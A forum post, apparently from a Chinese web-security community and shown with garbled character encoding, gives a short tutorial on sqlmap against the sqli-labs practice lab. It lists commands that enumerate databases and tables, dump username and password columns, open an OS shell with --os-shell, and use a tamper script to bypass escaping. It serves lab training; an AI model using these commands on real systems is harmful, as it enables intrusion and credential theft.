ÉèΪÊ×Ò³Êղر¾Õ¾
ËÑË÷
Kali±Ê¼Ç»ÉçÇø WEB°²È« SQL°²È« SQLmapµÄ»ù±¾Ê¹Ó÷½·¨
·µ»ØÁÐ±í ·¢ÐÂÌû
²é¿´: 1871|»Ø¸´: 2

SQLmapµÄ»ù±¾Ê¹Ó÷½·¨

  [¸´ÖÆÁ´½Ó]
zhen

45

Ö÷Ìâ

71

Ìû×Ó

166

»ý·Ö

×¢²á»áÔ±

Rank: 2

»ý·Ö
166

×¢²á»áÔ±»îÔ¾»áÔ±
·¢±íÓÚ 2021-1-22 22:34:55 | ÏÔʾȫ²¿Â¥²ã |ÔĶÁģʽ

È·¶¨×¢Èëµãºó²âÊÔ

sqlmap -u http://localhost/sqli/Less-1/?id=1

µ±Ç°Êý¾Ý¿â

 sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --current-db

ÆäËûÊý¾Ý¿â

--dbs

sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -dbs

Êý¾Ý¿âÄÚ±í

-D security --tables

sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security --tables

±íÄÚ×Ö¶Î

-D security -T users --columns

sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users --columns

-D security -T users -C username,password --dump

sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users -C username,password --dump

×¢ÈëShell

sqlmap -u http://192.168.2.12/sqli/Less-7/?id=1 --os-shell

¿í×Ö½Ú×¢Èë

ʹÓà unmagicquotes ·½·¨½øÐпí×Ö½ÚÈƹý

sqlmap.py -u http://127.0.0.1/Less-32/?id=1 --tamper "unmagicquotes" --dbs
sqlmap, sql×¢Èë

±¾Ìû×ÓÖаüº¬¸ü¶à×ÊÔ´

ÄúÐèÒª µÇ¼ ²Å¿ÉÒÔÏÂÔØ»ò²é¿´£¬Ã»ÓÐÕʺţ¿×¢²á

x

Ïà¹ØÌû×Ó

¸öÐÔ
»Ø¸´

ʹÓõÀ¾ß ¾Ù±¨

zhen

45

Ö÷Ìâ

71

Ìû×Ó

166

»ý·Ö

×¢²á»áÔ±

Rank: 2

»ý·Ö
166

×¢²á»áÔ±»îÔ¾»áÔ±
 Â¥Ö÷| ·¢±íÓÚ 2021-1-22 22:38:19 | ÏÔʾȫ²¿Â¥²ã
ÐÂÈË·¢Ìû£¬´óÀÐÃǶàÖ§³ÖÏ£¡
¸öÐÔ
»Ø¸´ Ö§³Ö ·´¶Ô

ʹÓõÀ¾ß ¾Ù±¨

priess1314

147

Ö÷Ìâ

239

Ìû×Ó

523

»ý·Ö

¸ß¼¶»áÔ±

ÖйúºÚ¿Í

Rank: 4

»ý·Ö
523
QQ
·¢±íÓÚ 2021-1-23 16:20:12 À´×ÔÊÖ»ú | ÏÔʾȫ²¿Â¥²ã
лл·ÖÏí£¡£¡£¡
»Ø¸´

ʹÓõÀ¾ß ¾Ù±¨

·µ»ØÁÐ±í ·¢ÐÂÌû
¸ß¼¶Ä£Ê½
B Color Image Link Quote Code Smilies
ÄúÐèÒªµÇ¼ºó²Å¿ÉÒÔ»ØÌû µÇ¼ | ×¢²á

±¾°æ»ý·Ö¹æÔò

¿ìËٻظ´ ·µ»Ø¶¥²¿ ·µ»ØÁбí